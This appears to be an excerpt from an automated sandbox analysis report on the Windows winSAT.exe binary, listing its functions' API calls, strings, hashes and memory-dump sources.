                                                                                                                                                                                              • Opcode ID: d2d592f9678acfc1f474ae83ccd7c4ae599ebd627f1dd43af6ba6778f801c080
                                                                                                                                                                                              • Instruction ID: 6e464154311c5a9a7bf6ac9847c20f1d2e655dfd6b5e6c9dfca0254eafec0c0c
                                                                                                                                                                                              • Opcode Fuzzy Hash: d2d592f9678acfc1f474ae83ccd7c4ae599ebd627f1dd43af6ba6778f801c080
                                                                                                                                                                                              • Instruction Fuzzy Hash: EA615F60E0D64295FB60BB11F8502BAEB50BF85748FF8A035D54D027E5CEADB454C761
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$base\winsat\exe\main.cpp$A#
                                                                                                                                                                                              • API String ID: 3961399675-2825078523
                                                                                                                                                                                              • Opcode ID: 4c8dbb392e71902b56219528c67e97095de549633f4d308d75f6940ab92bb137
                                                                                                                                                                                              • Instruction ID: b834435ef0b88f755d36fca79e474af13162b58f57687ca9cc08a25529e77a0d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c8dbb392e71902b56219528c67e97095de549633f4d308d75f6940ab92bb137
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE616C61E0D64295FB60BB11F8502BAEB50BF85788FF8A035D94E027E5CEADF454CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$CriticalEnabledSectionWrite$CountCurrentEnterFileLeaveProcessTickTransfer_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: %06u (%04u) - %s:%04d:
                                                                                                                                                                                              • API String ID: 3916971103-2080362037
                                                                                                                                                                                              • Opcode ID: 6956f2545bfb37e104e418aad3523fa818e7237dd857e046ff5a47df4cdc9311
                                                                                                                                                                                              • Instruction ID: bb5da82056956805e45869224adebe8d0f1f33435faf4ff11962ea03eae354fc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6956f2545bfb37e104e418aad3523fa818e7237dd857e046ff5a47df4cdc9311
                                                                                                                                                                                              • Instruction Fuzzy Hash: C9817262E08A9286E710AB14E8003B9BBA1FB55779FA48235D95D467D4DF7CE508CB20
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 3961399675-1443946128
                                                                                                                                                                                              • Opcode ID: 0235db7363cc9e20dcb545dfc6120c2959dbb1b17df69c66b44caaa3314128ca
                                                                                                                                                                                              • Instruction ID: f38248a14245ee041f926c1f2440001e75d7f290dae0ec72cc58d3fb51cd3373
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0235db7363cc9e20dcb545dfc6120c2959dbb1b17df69c66b44caaa3314128ca
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB616E61E0D64295FB60BB11F8502BAEB50BF85748FF89035D94E027E1DEADF454CB60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionHandleOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandlerLastLibraryModuleMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionFreeHandleOpenThrowValue$ConsoleCtrlDirectoryErrorFormatHandlerLastLibraryLocalMessageModuleMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Local$Free$AllocCreateDescriptorKnownSecurityWell$DaclEntriesInitializememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide$Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$CreateOpen
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$WinSAT regisrty key missing - create the winsat key$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1299239824-193752149
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseDirectoryHandleMutexReleaseRemoveUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1552449126-2481351200
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow__uncaught_exceptionstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: s is null
                                                                                                                                                                                              • API String ID: 541657574-2156393446
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC608
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC658
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC66C
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC6BA
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC508: GetProcessHeap.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC50C
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC508: HeapAlloc.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC526
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalHeapSection$AllocEnterErrorFileLastLeaveModuleNameProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2639094630-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC50C
                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC526
                                                                                                                                                                                              • memset.MSVCRT ref: 00007FF780FDC58B
                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC59C
                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC5B4
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountCriticalHeapSectionSpin$AllocProcessmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2926470208-0
                                                                                                                                                                                              • Opcode ID: f794ea072ace061bcdabc1a9a5e6bfa18bbb94d43a8795dee69ed95d3ab75b36
                                                                                                                                                                                              • Instruction ID: 799793712053406a307a41a3328242d47681c4edff39f27a2d6ae6ba20a1b928
                                                                                                                                                                                              • Opcode Fuzzy Hash: f794ea072ace061bcdabc1a9a5e6bfa18bbb94d43a8795dee69ed95d3ab75b36
                                                                                                                                                                                              • Instruction Fuzzy Hash: 76115225E19A0286EB04A711F814376BBA0FF49704FF5C135C54E467A4DFBDB04ACBA0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
                                                                                                                                                                                              • API String ID: 3677997916-3888772845
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorHandleInformationLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1721798545-0
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorHandleInformationLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1721798545-0
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CloseCreate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3491956904-0
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FolderPath
                                                                                                                                                                                              • String ID: Performance\WinSAT
                                                                                                                                                                                              • API String ID: 1514166925-139131759
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1859126369-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CompareString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1825529933-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memmove
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2162964266-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ??0exception@@malloc
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2247021969-0